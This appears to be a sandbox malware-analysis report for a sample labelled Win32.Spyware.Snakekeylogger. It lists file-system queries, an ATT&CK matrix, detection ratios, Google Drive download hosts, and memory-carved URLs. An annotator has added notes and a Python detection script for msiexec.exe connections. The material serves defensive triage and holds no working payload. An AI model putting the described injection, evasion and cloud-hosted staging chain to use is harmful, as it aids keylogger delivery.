    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exe; Code function: 0_2_00405D68 GetVersion, GetSystemDirectoryW, GetWindowsDirectoryW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, CoTaskMemFree, lstrcatW, lstrlenW. This is ordinary OS-version and system/shell-folder path resolution (the special-folder PIDL is converted to a path and freed), which installer stubs perform at start-up; it is not malicious on its own.
    MITRE ATT&CK matrix (one entry per tactic column, top to bottom as shown in the report; the number in square brackets is the report's signature-count badge for a technique it observed, and entries without a number are the matrix's unobserved placeholder techniques, including non-Windows ones such as Cron, Launchd, Login Hook and RC Scripts):
        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
        Execution: Windows Management Instrumentation [1]; Native API [1]; PowerShell [1]; Cron; Launchd; Scheduled Task
        Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
        Privilege Escalation: Process Injection [311]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
        Defense Evasion: Masquerading [1]; Virtualization/Sandbox Evasion [131]; Process Injection [311]; Software Packing [1]; DLL Side-Loading [1]; Steganography
        Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
        Discovery: Security Software Discovery [211]; Process Discovery [1]; Virtualization/Sandbox Evasion [131]; Application Window Discovery [1]; File and Directory Discovery [2]; System Information Discovery [14]
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
        Collection: Archive Collected Data [1]; Clipboard Data [1]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
        Command and Control: Encrypted Channel [11]; Ingress Tool Transfer [3]; Non-Application Layer Protocol [3]; Application Layer Protocol [14]; Fallback Channels; Multiband Communication
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
        Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
    The observed techniques that matter for triage are the ones with the largest badges: Process Injection, Virtualization/Sandbox Evasion, Security Software Discovery, System Information Discovery and Application Layer Protocol. The Credential Access, Lateral Movement and Exfiltration columns contain placeholders only, so the report records no evidence of credential theft or lateral movement during the run.
    Antivirus detection, submitted file (Source / Detection / Scanner / Label):
        YrCSUX2O3I.exe: 59% Virustotal; 58% ReversingLabs, label Win32.Spyware.Snakekeylogger
    Antivirus detection, dropped file:
        C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\YrCSUX2O3I.exe: 58% ReversingLabs, label Win32.Spyware.Snakekeylogger; 59% Virustotal
    No Antivirus matches (reported for three further detection tables)
    Reading note: the dropped file carries the same name and the same detection ratios as the submitted file, which indicates the sample copied itself unchanged into the Roaming profile path; the AppData\Roaming\Polysulfonate\sangersken\Skolevsens\ directory is therefore a good host-based indicator. The ReversingLabs label names the keylogger family the chain ultimately delivers; a vendor labelling by final payload and a sandbox labelling by loader stage can disagree on the name while describing the same infection chain, so the two should not be read as conflicting verdicts.
    Contacted domains (Name / IP / Active / Malicious / Antivirus detection / Reputation):
        s-part-0017.t-0009.t-msedge.net    13.107.246.45    active: true    malicious: false    AV detection: none listed    reputation: high
        drive.google.com    142.250.184.206    active: true    malicious: false    AV detection: none listed    reputation: high
        drive.usercontent.google.com    142.250.181.225    active: true    malicious: false    AV detection: none listed    reputation: high
    Reading note: "malicious: false" and a high reputation describe the hosting service, not what it served. The two Google Drive hosts are the ones the URL table below attributes to strings in msiexec.exe memory, consistent with the injected process downloading a further stage from cloud storage; drive.usercontent.google.com in particular is the direct-download endpoint. The t-msedge.net name is a Microsoft CDN endpoint and is best treated as OS background traffic unless process-level evidence ties it to the sample.
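    The table above gives three resolved hosts, but only the two Google Drive names are also present as URL strings in the injected msiexec.exe process, and one of them is a Microsoft CDN name. The following is an added example (mine, not part of the Joe Sandbox report): it intersects the contacted-domains table with the hosts named in the msiexec.exe memory strings, drops known-benign Microsoft names, and then scores Sysmon Event ID 3 style connection records the way the "Msiexec Initiated Connection" Sigma logic would, flagging any msiexec.exe connection to a non-private destination and promoting hits on the report's indicators to IOC matches. The indicator values are copied from the report; the event records, the benign-suffix list and the record field names are assumptions made for the example.

```python
"""Added example, not part of the Joe Sandbox report: turn the report's network
indicators into a host-side triage check. Indicator values are copied from the
report; the Sysmon-style event records are constructed for the example."""
import ipaddress
from urllib.parse import urlsplit

# Contacted-domains table from the report (name -> resolved IP).
REPORT_DOMAINS = {
    "s-part-0017.t-0009.t-msedge.net": "13.107.246.45",
    "drive.google.com": "142.250.184.206",
    "drive.usercontent.google.com": "142.250.181.225",
}

# URL strings the report carved from msiexec.exe memory, as printed there.
# The odd path suffixes are residue from adjacent memory, so only the host
# part of each string is trusted.
REPORT_URL_STRINGS = [
    "https://www.google.com",
    "https://drive.google.com/;",
    "https://drive.google.com/ervices-cn.com",
    "https://drive.usercontent.google.com/&",
    "https://translate.google.com/translate_a/element.js",
]

# Assumption for this example: Microsoft CDN/update names are background
# traffic from the sandbox OS, not something the sample reached for.
BENIGN_SUFFIXES = ("t-msedge.net", "microsoft.com", "windowsupdate.com")


def is_benign_host(host):
    h = host.lower().rstrip(".")
    return any(h == s or h.endswith("." + s) for s in BENIGN_SUFFIXES)


def hosts_from_url_strings(strings):
    """Reduce memory-carved URL fragments to the set of hostnames they name."""
    hosts = set()
    for s in strings:
        p = urlsplit(s)
        if p.scheme in ("http", "https") and p.hostname:
            hosts.add(p.hostname)
    return hosts


def build_watchlist(domains, url_strings):
    """Hosts worth alerting on: named in the injected process's memory AND
    actually contacted during the run, minus known-benign OS background."""
    named = hosts_from_url_strings(url_strings)
    hosts = {d for d in domains if d in named and not is_benign_host(d)}
    ips = {domains[d] for d in hosts}
    return hosts, ips


def classify_connection(event, watch_hosts, watch_ips):
    """Sysmon Event ID 3 style record -> None, 'suspicious' or 'ioc_match'.

    Any outbound connection from msiexec.exe to a non-benign, non-private
    destination is suspicious (the idea behind the 'Msiexec Initiated
    Connection' Sigma rule); a hit on the report's indicators is an IOC match.
    """
    image = event.get("Image", "").lower()
    if not image.endswith("\\msiexec.exe"):
        return None
    host = (event.get("DestinationHostname") or "").lower().rstrip(".")
    ip = event.get("DestinationIp", "")
    if host in watch_hosts or ip in watch_ips:
        return "ioc_match"
    if host and is_benign_host(host):
        return None
    try:
        addr = ipaddress.ip_address(ip)
        if addr.is_private or addr.is_loopback or addr.is_link_local:
            return None
    except ValueError:
        pass  # missing or unparseable IP: fall through and still flag the host
    return "suspicious"


def triage(events, domains=REPORT_DOMAINS, url_strings=REPORT_URL_STRINGS):
    """Group flagged destinations by verdict, preserving event order."""
    watch_hosts, watch_ips = build_watchlist(domains, url_strings)
    out = {"ioc_match": [], "suspicious": []}
    for e in events:
        verdict = classify_connection(e, watch_hosts, watch_ips)
        if verdict:
            out[verdict].append(e.get("DestinationHostname") or e.get("DestinationIp"))
    return out


# Constructed Sysmon-style network events (assumed field names, not from the report).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "DestinationHostname": "drive.usercontent.google.com",
     "DestinationIp": "142.250.181.225", "DestinationPort": 443},
    {"Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "DestinationHostname": "s-part-0017.t-0009.t-msedge.net",
     "DestinationIp": "13.107.246.45", "DestinationPort": 443},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "DestinationHostname": "", "DestinationIp": "10.0.0.5", "DestinationPort": 445},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "DestinationHostname": "cdn.example.net",
     "DestinationIp": "93.184.216.34", "DestinationPort": 80},
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationHostname": "drive.google.com",
     "DestinationIp": "142.250.184.206", "DestinationPort": 443},
]

if __name__ == "__main__":
    for verdict, dests in triage(SAMPLE_EVENTS).items():
        print(f"{verdict}: {dests}")
```

    The watch-list step is the point of the exercise: www.google.com and translate.google.com appear in msiexec.exe memory but were never contacted, and the t-msedge.net host was contacted but is neither named in the injected process nor non-Microsoft, so only the two Drive hosts and their IPs survive. Hunting on the full URL table without that reduction would page on ordinary browser traffic.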
          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.commsiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135941062.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2432767321.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2185649651.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://drive.google.com/;msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://drive.google.com/ervices-cn.commsiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://drive.google.com/etmsiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466770656.0000000008030000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2123562712.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161884513.0000000008037000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2385950640.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161988964.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, 
msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2098790096.0000000008037000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://drive.google.com/Wmsiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://drive.google.com/msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://drive.google.com/rSmsiexec.exe, 00000008.00000003.2185608477.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2172678889.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://drive.google.com/umsiexec.exe, 00000008.00000003.2098833921.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2110507536.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2087985140.0000000007FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
